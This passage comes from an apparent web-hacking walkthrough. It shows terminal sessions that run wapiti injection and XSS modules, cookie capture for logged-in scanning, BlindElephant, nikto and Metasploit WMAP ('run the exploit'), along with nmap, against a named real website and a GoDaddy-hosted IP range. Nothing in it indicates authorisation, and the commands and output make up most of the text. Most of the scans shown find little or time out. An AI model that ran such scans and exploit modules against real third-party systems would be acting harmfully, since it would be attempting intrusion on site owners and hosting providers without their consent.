1247. + attackGET http://www.vyxunbnbs.com/contact.html
1248. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
1249. + attackGET http://www.vyxunbnbs.com/products.html
1250. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
1251. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
1252. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
1253. + attackGET http://www.vyxunbnbs.com/bone-art.html
1254. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
1255. + attackGET http://www.vyxunbnbs.com/wooden-items.html
1256. + attackGET http://www.vyxunbnbs.com/random-items.html
1257. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
1258. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
1259. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
1260. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
1261. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
1262. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
1263. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
1264. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
1265. + attackGET http://www.vyxunbnbs.com/Loading...
1266. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
1267. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
1268. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
1269.  
1270. [+] Launching module sql
1271. + attackGET http://www.vyxunbnbs.com/
1272. + attackGET http://www.vyxunbnbs.com/site.css?v=
1273. + attackGET http://www.vyxunbnbs.com/common/wsb/core
1274. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
1275. + attackGET http://www.vyxunbnbs.com/home.html
1276. + attackGET http://www.vyxunbnbs.com/contact.html
1277. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
1278. + attackGET http://www.vyxunbnbs.com/products.html
1279. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
1280. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
1281. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
1282. + attackGET http://www.vyxunbnbs.com/bone-art.html
1283. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
1284. + attackGET http://www.vyxunbnbs.com/wooden-items.html
1285. + attackGET http://www.vyxunbnbs.com/random-items.html
1286. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
1287. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
1288. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
1289. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
1290. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
1291. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
1292. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
1293. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
1294. + attackGET http://www.vyxunbnbs.com/Loading...
1295. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
1296. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
1297. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
1298.  
1299. [+] Launching module xss
1300. + attackGET http://www.vyxunbnbs.com/
1301. + attackGET http://www.vyxunbnbs.com/site.css?v=
1302. + attackGET http://www.vyxunbnbs.com/common/wsb/core
1303. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
1304. + attackGET http://www.vyxunbnbs.com/home.html
1305. + attackGET http://www.vyxunbnbs.com/contact.html
1306. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
1307. + attackGET http://www.vyxunbnbs.com/products.html
1308. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
1309. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
1310. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
1311. + attackGET http://www.vyxunbnbs.com/bone-art.html
1312. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
1313. + attackGET http://www.vyxunbnbs.com/wooden-items.html
1314. + attackGET http://www.vyxunbnbs.com/random-items.html
1315. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
1316. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
1317. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
1318. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
1319. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
1320. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
1321. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
1322. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
1323. + attackGET http://www.vyxunbnbs.com/Loading...
1324. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
1325. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
1326. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
1327.  
1328. [+] Launching module blindsql
1329. + attackGET http://www.vyxunbnbs.com/
1330. + attackGET http://www.vyxunbnbs.com/site.css?v=
1331. + attackGET http://www.vyxunbnbs.com/common/wsb/core
1332. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
1333. + attackGET http://www.vyxunbnbs.com/home.html
1334. + attackGET http://www.vyxunbnbs.com/contact.html
1335. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
1336. + attackGET http://www.vyxunbnbs.com/products.html
1337. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
1338. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
1339. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
1340. + attackGET http://www.vyxunbnbs.com/bone-art.html
1341. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
1342. + attackGET http://www.vyxunbnbs.com/wooden-items.html
1343. + attackGET http://www.vyxunbnbs.com/random-items.html
1344. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
1345. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
1346. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
1347. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
1348. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
1349. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
1350. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
1351. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
1352. + attackGET http://www.vyxunbnbs.com/Loading...
1353. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
1354. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
1355. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
1356.  
1357. [+] Launching module permanentxss
1358. + http://www.vyxunbnbs.com/
1359. + http://www.vyxunbnbs.com/site.css?v=
1360. + http://www.vyxunbnbs.com/common/wsb/core
1361. + http://www.vyxunbnbs.com/libs/knockout/knockout
1362. + http://www.vyxunbnbs.com/home.html
1363. + http://www.vyxunbnbs.com/contact.html
1364. + http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
1365. + http://www.vyxunbnbs.com/products.html
1366. + http://www.vyxunbnbs.com/bullet-jewellery.html
1367. + http://www.vyxunbnbs.com/boar-tusk-necklaces.html
1368. + http://www.vyxunbnbs.com/decorated-skulls-.html
1369. + http://www.vyxunbnbs.com/bone-art.html
1370. + http://www.vyxunbnbs.com/leather-crafting.html
1371. + http://www.vyxunbnbs.com/wooden-items.html
1372. + http://www.vyxunbnbs.com/random-items.html
1373. + http://www.vyxunbnbs.com/WSB.ForceDesktop
1374. + http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
1375. + http://www.vyxunbnbs.com/designer/iebackground/iebackground
1376. + http://www.vyxunbnbs.com/.view-as-mobile
1377. + http://www.vyxunbnbs.com/.wsb-canvas-page-container
1378. + http://www.vyxunbnbs.com/vyxunbnbs.com
1379. + http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
1380. + http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
1381. + http://www.vyxunbnbs.com/Loading...
1382. + http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
1383. + http://www.vyxunbnbs.com/plugins/twitter/index.php
1384. + http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
1385.  
1386. Report
1387. ------
1388. A report has been generated in the file /tmp/scan_report
1389. Open /tmp/scan_report/index.html with a browser to see this report.
1390.  
1391. ┌─[root@parrot]─[~]
1392. └──╼ #firefox /tmp/scan_report/index.html
1393.  
1394.  
1395. ...........................
1396. Note
1397. ========
1398. This scan has been saved in the file /root/.wapiti/scans/www.vyxunbnbs.com.xml
1399. You can use it to perform attacks without scanning again the web site with the "-k" parameter
1400.  
1401.  
1402. NOTE
1403.  
1404. wapiti works better when you use the cookie value.
1405.  
1406. To get the cookie use the getcookie.py script
1407.  
1408. Use getcookie.py.
1409.  
1410. Usage: python getcookie.py <cookie_file> <url_with_form>
1411.  
1412. It will dump the cookie to the file. After getting the cookie set Powerfuzzer to use it (Cookie button in the GUI)
1413.  
1414. Cookies are save in LWP format. (LWPCookieJar)
1415.  
1416. #LWP-Cookies-2.0
1417. Set-Cookie3: SID=a0b498e88f488dd8a48baf6778da85b9; path="/"; domain="test.com"; path_spec; discard; version=0
1418.  
1419.  
1420. ┌─[✗]─[root@parrot]─[/usr/share/powerfuzzer]
1421. └──╼ #./getcookie.py ~/cookie.txt http://www.vyxunbnbs.com/webapp/login.php
1422.  
1423. Enter username/password etc as required to complete the login form
1424.  
1425. Script exists, check the contents of ~/cookie.txt – it will look something like :
1426.  
1427. #LWP-Cookies-2.0
1428.  
1429. Set-Cookie3: PHPSESSID=3d20841af5de43c718732d80e5d78fe3; path=”/”; domain=”orange”; path_spec; expires=”2010-01-04 22:42:47Z”; version=0
1430.  
1431. Now we can use wapiti to test any urls ‘behind’ the login screen (as it were) :
1432.  
1433. wapiti http://www.vyxunbnbs.com/webapp/search.php –cookie ~/cookie.txt -v 2 -o ~/report -x http://www.vyxunbnbs.com/webapp/logout.php
1434.  
1435. (We need to exclude the logout page, else our session will get destroyed when wapiti spiders that page…)
1436.  
1437.  
1438. USE BLINDELEPHANT
1439.  
1440. https://media.blackhat.com/bh-us-10/presentations/Thomas/BlackHat-USA-2010-Thomas-BlindElephant-WebApp-Fingerprinting-slides.pdf
1441.  
1442. BlindElephant.py http://www.somesite.com appName
1443.  
1444. BlindElephant.py http://forum.somesite.com phpbb
1445.  
1446. ┌─[root@parrot]─[~]
1447. └──╼ #BlindElephant.py www.vyxunbnbs.com movabletype
1448. Loaded /usr/lib/pymodules/python2.7/blindelephant/dbs/movabletype.pkl with 101 versions, 2229 differentiating paths, and 216 version groups.
1449. Starting BlindElephant fingerprint for version of movabletype at http://www.vyxunbnbs.com
1450.  
1451. Hit http://www.vyxunbnbs.com/mt-static/mt.js
1452. File produced no match. Error: Failed to reach a server: timed out
1453.  
1454. Hit http://www.vyxunbnbs.com/mt-static/js/tc/client.js
1455. File produced no match. Error: Failed to reach a server: timed out
1456.  
1457.  
1458. Error: All versions ruled out!
1459.  
1460.  
1461.  
1462. CHECK THE SITE WITH NIKTO
1463.  
1464. ┌─[root@parrot]─[~]
1465. └──╼ #nikto -h 198.71.232.3
1466. - Nikto v2.1.6
1467. ---------------------------------------------------------------------------
1468. + No web server found on 198.71.232.3:80
1469. ---------------------------------------------------------------------------
1470. + 0 host(s) tested
1471.  
1472. ┌─[root@parrot]─[~]
1473. └──╼ #nikto -h 198.71.232.3 -p 443
1474. - Nikto v2.1.6
1475. ---------------------------------------------------------------------------
1476. + Target IP: 198.71.232.3
1477. + Target Hostname: 198.71.232.3
1478. + Target Port: 443
1479. ---------------------------------------------------------------------------
1480. + SSL Info: Subject: /C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, LLC/CN=*.godaddysites.com
1481. Ciphers: ECDHE-RSA-AES256-GCM-SHA384
1482. Issuer: /C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, Inc./OU=http://certificates.godaddy.com/repository/CN=Go Daddy Secure Certification Authority/serialNumber=07969287
1483. + Start Time: 2016-05-29 17:25:53 (GMT2)
1484. ---------------------------------------------------------------------------
1485. + Server: DPS/1.0.3
1486. + Cookie dps_site_id created without the secure flag
1487. + Cookie dps_site_id created without the httponly flag
1488. + The anti-clickjacking X-Frame-Options header is not present.
1489. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
1490. + Uncommon header 'x-siteid' found, with contents: 2000
1491. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
1492. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
1493. + No CGI Directories found (use '-C all' to force check all possible dirs)
1494. + Server is using a wildcard certificate: *.godaddysites.com
1495. + Hostname '198.71.232.3' does not match certificate's names: *.godaddysites.com
1496. + ERROR: Error limit (20) reached for host, giving up. Last error:
1497. + Scan terminated: 18 error(s) and 9 item(s) reported on remote host
1498. + End Time: 2016-05-29 18:04:21 (GMT2) (2308 seconds)
1499. ---------------------------------------------------------------------------
1500. + 1 host(s) tested
1501.  
1502.  
1503. USE METASPLOIT
1504.  
1505. ____ _ ____
1506. | _ \ __ _ _ __ _ __ ___ | |_/ ___| ___ ___
1507. | |_) / _` | '__| '__/ _ \| __\___ \ / _ \/ __|
1508. | __/ (_| | | | | | (_) | |_ ___) | __/ (__
1509. |_| \__,_|_| |_| \___/ \__|____/ \___|\___|
1510.  
1511.  
1512. executing "msfstart"
1513.  
1514. Creating database user 'msf'
1515. Enter password for new role:
1516. Enter it again:
1517. Creating databases 'msf' and 'msf_test'
1518. Creating configuration file in /usr/share/metasploit-framework/config/database.yml
1519. Creating initial database schema
1520. ┌─[root@parrot]─[~]
1521. └──╼ #msfconsole
1522.  
1523. Call trans opt: received. 2-19-98 13:24:18 REC:Loc
1524.  
1525. Trace program: running
1526.  
1527. wake up, Neo...
1528. the matrix has you
1529. follow the white rabbit.
1530.  
1531. knock, knock, Neo.
1532.  
1533. (`. ,-,
1534. ` `. ,;' /
1535. `. ,'/ .'
1536. `. X /.'
1537. .-;--''--.._` ` (
1538. .' / `
1539. , ` ' Q '
1540. , , `._ \
1541. ,.| ' `-.;_'
1542. : . ` ; ` ` --,.._;
1543. ' ` , ) .'
1544. `._ , ' /_
1545. ; ,''-,;' ``-
1546. ``-..__``--`
1547.  
1548.  
1549. http://metasploit.pro
1550.  
1551.  
1552. Easy phishing: Set up email templates, landing pages and listeners
1553. in Metasploit Pro -- learn more on http://rapid7.com/metasploit
1554.  
1555. =[ metasploit v4.11.5-2016010401 ]
1556. + -- --=[ 1517 exploits - 875 auxiliary - 257 post ]
1557. + -- --=[ 437 payloads - 37 encoders - 8 nops ]
1558. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
1559.  
1560. msf >
1561.  
1562.  
1563. CONNECT TO THE POSTGRES DB
1564.  
1565. msf > db_connect root:toor
1566. [-] postgresql already connected to msf
1567. [-] Run db_disconnect first if you wish to connect to a different database
1568. msf >
1569.  
1570.  
1571. CHECK DB STATUS
1572.  
1573. msf > db_status
1574. [*] postgresql connected to msf
1575.  
1576.  
1577. USE WMAP
1578.  
1579. msf > load wmap
1580.  
1581. .-.-.-..-.-.-..---..---.
1582. | | | || | | || | || |-'
1583. `-----'`-'-'-'`-^-'`-'
1584. [WMAP 1.5.1] === et [ ] metasploit.com 2012
1585. [*] Successfully loaded plugin: wmap
1586. msf >
1587.  
1588. ADD THE SITE
1589.  
1590. msf > wmap_sites -a http://www.vyxunbnbs.com
1591.  
1592. msf > wmap_sites -l
1593.  
1594. ADD THE TARGET
1595.  
1596. msf > wmap_targets -t http://198.71.232.3
1597. msf > wmap_targets -l
1598. [*] Defined targets
1599. ===============
1600.  
1601. Id Vhost Host Port SSL Path
1602. -- ----- ---- ---- --- ----
1603. 0 198.71.232.3 198.71.232.3 80 false /
1604.  
1605.  
1606. RUN THE TEST
1607.  
1608. msf > wmap_run -t
1609. [*] Testing target:
1610. [*] Site: 198.71.232.3 (198.71.232.3)
1611. [*] Port: 80 SSL: false
1612. ============================================================
1613. [*] Testing started. 2016-05-29 13:37:42 +0200
1614. [*] Loading wmap modules...
1615. [*] 40 wmap enabled modules loaded.
1616. [*]
1617. =[ SSL testing ]=
1618. ============================================================
1619. [*] Target is not SSL. SSL modules disabled.
1620. [*]
1621. =[ Web Server testing ]=
1622. ============================================================
1623. [*] Module auxiliary/scanner/http/http_version
1624. [*] Module auxiliary/scanner/http/open_proxy
1625. [*] Module auxiliary/scanner/http/robots_txt
1626. [*] Module auxiliary/scanner/http/frontpage_login
1627. [*] Module auxiliary/scanner/http/host_header_injection
1628. [*] Module auxiliary/admin/http/tomcat_administration
1629. [*] Module auxiliary/admin/http/tomcat_utf8_traversal
1630. [*] Module auxiliary/scanner/http/options
1631. [*] Module auxiliary/scanner/http/drupal_views_user_enum
1632. [*] Module auxiliary/scanner/http/scraper
1633. [*] Module auxiliary/scanner/http/svn_scanner
1634. [*] Module auxiliary/scanner/http/trace
1635. [*] Module auxiliary/scanner/http/vhost_scanner
1636. [*] Module auxiliary/scanner/http/webdav_internal_ip
1637. [*] Module auxiliary/scanner/http/webdav_scanner
1638. [*] Module auxiliary/scanner/http/webdav_website_content
1639. [*]
1640. =[ File/Dir testing ]=
1641. ============================================================
1642. [*] Module auxiliary/dos/http/apache_range_dos
1643. [*] Module auxiliary/scanner/http/backup_file
1644. [*] Module auxiliary/scanner/http/brute_dirs
1645. [*] Module auxiliary/scanner/http/copy_of_file
1646. [*] Module auxiliary/scanner/http/dir_listing
1647. [*] Module auxiliary/scanner/http/dir_scanner
1648. [*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
1649. [*] Module auxiliary/scanner/http/file_same_name_dir
1650. [*] Module auxiliary/scanner/http/files_dir
1651. [*] Module auxiliary/scanner/http/http_put
1652. [*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
1653. [*] Module auxiliary/scanner/http/prev_dir_same_name_file
1654. [*] Module auxiliary/scanner/http/replace_ext
1655. [*] Module auxiliary/scanner/http/soap_xml
1656. [*] Module auxiliary/scanner/http/trace_axd
1657. [*] Module auxiliary/scanner/http/verb_auth_bypass
1658. [*]
1659. =[ Unique Query testing ]=
1660. ============================================================
1661. [*] Module auxiliary/scanner/http/blind_sql_query
1662. [*] Module auxiliary/scanner/http/error_sql_injection
1663. [*] Module auxiliary/scanner/http/http_traversal
1664. [*] Module auxiliary/scanner/http/rails_mass_assignment
1665. [*] Module exploit/multi/http/lcms_php_exec
1666. [*]
1667. =[ Query testing ]=
1668. ============================================================
1669. [*]
1670. =[ General testing ]=
1671. ============================================================
1672. [*] Done.
1673.  
1674. All that remains now is to actually run the WMAP scan against our target URL.
1675.  
1676. RUN THE EXPLOIT
1677.  
1678. msf > wmap_run -e
1679. [*] Using ALL wmap enabled modules.
1680. [-] NO WMAP NODES DEFINED. Executing local modules
1681. [*] Testing target:
1682. [*] Site: 198.71.232.3 (198.71.232.3)
1683. [*] Port: 80 SSL: false
1684. ============================================================
1685. [*] Testing started. 2016-05-29 13:38:10 +0200
1686. [*]
1687. =[ SSL testing ]=
1688. ============================================================
1689. [*] Target is not SSL. SSL modules disabled.
1690. [*]
1691. =[ Web Server testing ]=
1692. ============================================================
1693. [*] Module auxiliary/scanner/http/http_version
1694.  
1695. [*] 198.71.232.3:80 DPS/1.0.3
1696. [*] Module auxiliary/scanner/http/open_proxy
1697. [*] Module auxiliary/scanner/http/robots_txt
1698. [*] Module auxiliary/scanner/http/frontpage_login
1699. [*] http://198.71.232.3/ may not support FrontPage Server Extensions
1700. [*] Module auxiliary/scanner/http/host_header_injection
1701. [*] Module auxiliary/admin/http/tomcat_administration
1702. [*] Module auxiliary/admin/http/tomcat_utf8_traversal
1703. [*] Attempting to connect to 198.71.232.3:80
1704. [+] No File(s) found
1705. [*] Module auxiliary/scanner/http/options
1706. [*] Module auxiliary/scanner/http/drupal_views_user_enum
1707. [-] 198.71.232.3 does not appear to be vulnerable, will not continue
1708. [*] Module auxiliary/scanner/http/scraper
1709. [*] [198.71.232.3] / [404 Not Found]
1710. [*] Module auxiliary/scanner/http/svn_scanner
1711. [*] Using code '404' as not found.
1712. [*] Module auxiliary/scanner/http/trace
1713. [*] Module auxiliary/scanner/http/vhost_scanner
1714. [*] >> Exception during launch from auxiliary/scanner/http/vhost_scanner: The following options failed to validate: DOMAIN.
1715. [*] Module auxiliary/scanner/http/webdav_internal_ip
1716. [*] Module auxiliary/scanner/http/webdav_scanner
1717. [*] Module auxiliary/scanner/http/webdav_website_content
1718. [*]
1719. =[ File/Dir testing ]=
1720. ============================================================
1721. [*] Module auxiliary/dos/http/apache_range_dos
1722. [*] Module auxiliary/scanner/http/backup_file
1723. [*] Module auxiliary/scanner/http/brute_dirs
1724. [*] Path: /
1725. [*] Using code '404' as not found.
1726. [*] Module auxiliary/scanner/http/copy_of_file
1727. [*] Module auxiliary/scanner/http/dir_listing
1728. [*] Path: /
1729. [*] Module auxiliary/scanner/http/dir_scanner
1730. [*] Path: /
1731. [*] Detecting error code
1732. [*] Using code '404' as not found for 198.71.232.3
1733. [*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
1734. [*] Path: /
1735. [*] Using code '404' as not found.
1736. [*] Module auxiliary/scanner/http/file_same_name_dir
1737. [*] Path: /
1738. [-] Blank or default PATH set.
1739. [*] Module auxiliary/scanner/http/files_dir
1740. [*] Path: /
1741. [*] Using code '404' as not found for files with extension .null
1742. [*] Module auxiliary/scanner/http/http_put
1743. [*] Path: /
1744. [-] File doesn't seem to exist. The upload probably failed.
1745. [*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
1746. [*] Path: /
1747. [-] 198.71.232.3:80 Folder does not require authentication. [404]
1748. [*] Module auxiliary/scanner/http/prev_dir_same_name_file
1749. [*] Path: /
1750. [-] Blank or default PATH set.
1751. [*] Module auxiliary/scanner/http/replace_ext
1752. [*] Module auxiliary/scanner/http/soap_xml
1753. [*] Path: /
1754. [*] Starting scan with 0ms delay between requests
1755. [-] The connection timed out (198.71.232.3:80).
1756. [-] The connection timed out (198.71.232.3:80).
1757. [*] Module auxiliary/scanner/http/trace_axd
1758. [*] Path: /
1759. [*] Module auxiliary/scanner/http/verb_auth_bypass
1760. [*]
1761. =[ Unique Query testing ]=
1762. ============================================================
1763. [*] Module auxiliary/scanner/http/blind_sql_query
1764. [*] Module auxiliary/scanner/http/error_sql_injection
1765. [*] Module auxiliary/scanner/http/http_traversal
1766. [*] Module auxiliary/scanner/http/rails_mass_assignment
1767. [*] Module exploit/multi/http/lcms_php_exec
1768. [*]
1769. =[ Query testing ]=
1770. ============================================================
1771. [*]
1772. =[ General testing ]=
1773. ============================================================
1774. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1775. Launch completed in 8302.240582227707 seconds.
1776. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1777. [*] Done.
1778.  
1779. Once the scan has finished executing, we take a look at the database to see if WMAP found anything of interest.
1780.  
1781.  
1782. CHECK THE VULNERABILITIES
1783.  
1784. msf > wmap_vulns -l
1785. [*] + [198.71.232.3] (198.71.232.3): scraper /
1786. [*] scraper Scraper
1787. [*] GET 404 Not Found
1788.  
1789.  
1790. EXECUTE VULNERABILITIES
1791.  
1792. msf > vulns
1793.  
1794.  
1795. RUN DB_NMAP
1796.  
1797. msf > db_nmap 198.71.232.3 -PN
1798. [*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 17:31 CEST
1799. [*] Nmap: 'mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers'
1800. [*] Nmap: Nmap scan report for 198.71.232.3
1801. [*] Nmap: Host is up (0.11s latency).
1802. [*] Nmap: Not shown: 998 filtered ports
1803. [*] Nmap: PORT STATE SERVICE
1804. [*] Nmap: 80/tcp open http
1805. [*] Nmap: 443/tcp open https
1806. [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 13.02 seconds
1807.  
1808. EXPORT NMAP RESULTS
1809.  
1810. msf > db_export -f xml /root/Desktop/Exported.xml
1811. [*] Starting export of workspace default to /root/Desktop/Exported.xml [ xml ]...
1812. [*] >> Starting export of report
1813. [*] >> Starting export of hosts
1814. [*] >> Starting export of events
1815. [*] >> Starting export of services
1816. [*] >> Starting export of web sites
1817. [*] >> Starting export of web pages
1818. [*] >> Starting export of web forms
1819. [*] >> Starting export of web vulns
1820. [*] >> Starting export of module details
1821. [*] >> Finished export of report
1822. [*] Finished export of workspace default to /root/Desktop/Exported.xml [ xml ]...
1823.  
1824.  
1825. IMPORT NMAP RESULTS
1826.  
1827. msf > db_import /root/Desktop/Exported.xml
1828.  
1829. msf > db_import /root/Desktop/Exported.xml
1830. [*] Importing 'Metasploit XML' data
1831. [*] Importing host 198.71.232.0
1832. [*] Importing host 198.71.232.1
1833. [*] Importing host 198.71.232.2
1834. [*] Importing host 198.71.232.3
1835. [*] Importing host 198.71.232.4
1836. [*] Importing host 198.71.232.5
1837. [*] Importing host 198.71.232.6
1838. [*] Importing host 198.71.232.7
1839. [*] Importing host 198.71.232.9
1840. [*] Successfully imported /root/Desktop/Exported.xml
1841.  
1842.  
1843.  
1844. msf > hosts
1845.  
1846. Hosts
1847. =====
1848.  
1849. address mac name os_name os_flavor os_sp purpose info comments
1850. ------- --- ---- ------- --------- ----- ------- ---- --------
1851. 198.71.232.0 Unknown device
1852. 198.71.232.1 Unknown device
1853. 198.71.232.2 Unknown device
1854. 198.71.232.3 198.71.232.3 Unknown device
1855. 198.71.232.4 Unknown device
1856. 198.71.232.5 Unknown device
1857. 198.71.232.6 Unknown device
1858. 198.71.232.7 Unknown device
1859. 198.71.232.9 Unknown device
1860.  
1861.  
1862.  
1863. msf > hosts -c address,os_flavor
1864.  
1865. Hosts
1866. =====
1867.  
1868. address os_flavor
1869. ------- ---------
1870. 198.71.232.0
1871. 198.71.232.1
1872. 198.71.232.2
1873. 198.71.232.3
1874. 198.71.232.4
1875. 198.71.232.5
1876. 198.71.232.6
1877. 198.71.232.7
1878. 198.71.232.9
1879.  
1880.  
1881.  
1882. msf > hosts -c address,os_flavor -S Linux
1883.  
1884. msf auxiliary(tcp) > show options
1885.  
1886. msf auxiliary(tcp) > hosts -c address,os_flavor -S Linux -R
1887.  
1888. RHOSTS => 198.71.232.3
1889.  
1890. msf auxiliary(tcp) > run
1891.  
1892. msf auxiliary(tcp) > hosts -R
1893.  
1894. RHOSTS => 198.71.232.3
1895.  
1896. msf auxiliary(tcp) > show options
1897.  
1898. msf > services -c name,info 198.71.232.3
1899.  
1900. Services
1901. ========
1902.  
1903. host name info
1904. ---- ---- ----
1905. 198.71.232.3 http DPS/1.0.3
1906. 198.71.232.3 https
1907.  
1908.  
1909. msf > services -c name,info -S http
1910.  
1911. Services
1912. ========
1913.  
1914. host name info
1915. ---- ---- ----
1916. 198.71.232.3 http DPS/1.0.3
1917. 198.71.232.3 https
1918. 198.71.232.4 https
1919. 198.71.232.4 http
1920. 198.71.232.5 https
1921. 198.71.232.6 http
1922. 198.71.232.6 https
1923. 198.71.232.7 http
1924. 198.71.232.7 https
1925. 198.71.232.9 http
1926.  
1927. msf > services -c name,info -S https
1928.  
1929. Services
1930. ========
1931.  
1932. host name info
1933. ---- ---- ----
1934. 198.71.232.3 https
1935. 198.71.232.4 https
1936. 198.71.232.5 https
1937. 198.71.232.6 https
1938. 198.71.232.7 https
1939.  
1940.  
1941. msf > services -c info,name -p 443
1942.  
1943. Services
1944. ========
1945.  
1946. host info name
1947. ---- ---- ----
1948. 198.71.232.3 https
1949. 198.71.232.4 https
1950. 198.71.232.5 https
1951. 198.71.232.6 https
1952. 198.71.232.7 https
1953.  
1954.  
1955. msf > services -c port,proto,state -p 70-81
1956.  
1957. msf > services -c port,proto,state -p 70-81
1958.  
1959. Services
1960. ========
1961.  
1962. host port proto state
1963. ---- ---- ----- -----
1964. 198.71.232.3 80 tcp open
1965. 198.71.232.4 80 tcp open
1966. 198.71.232.6 80 tcp open
1967. 198.71.232.7 80 tcp open
1968. 198.71.232.9 80 tcp open
1969.  
1970. msf > services -c port,proto,state -p 70-81-3306
1971.  
1972. Services
1973. ========
1974.  
1975. host port proto state
1976. ---- ---- ----- -----
1977. 198.71.232.3 80 tcp open
1978. 198.71.232.4 80 tcp open
1979. 198.71.232.6 80 tcp open
1980. 198.71.232.7 80 tcp open
1981. 198.71.232.9 80 tcp open
1982.  
1983.  
1984. msf > services -c port,proto,state -p 21-22-25-70-80-81-443-3306
1985.  
1986. Services
1987. ========
1988.  
1989. host port proto state
1990. ---- ---- ----- -----
1991. 198.71.232.7 22 tcp open
1992.  
1993.  
1994. msf > services -s http -c port 198.71.232.3
1995.  
1996. Services
1997. ========
1998.  
1999. host port
2000. ---- ----
2001. 198.71.232.3 80
2002.  
2003. msf > services -s https -c port 198.71.232.3
2004.  
2005. Services
2006. ========
2007.  
2008. host port
2009. ---- ----
2010. 198.71.232.3 443
2011.  
2012.  
2013. msf > services -S Unr
2014.  
2015. Services
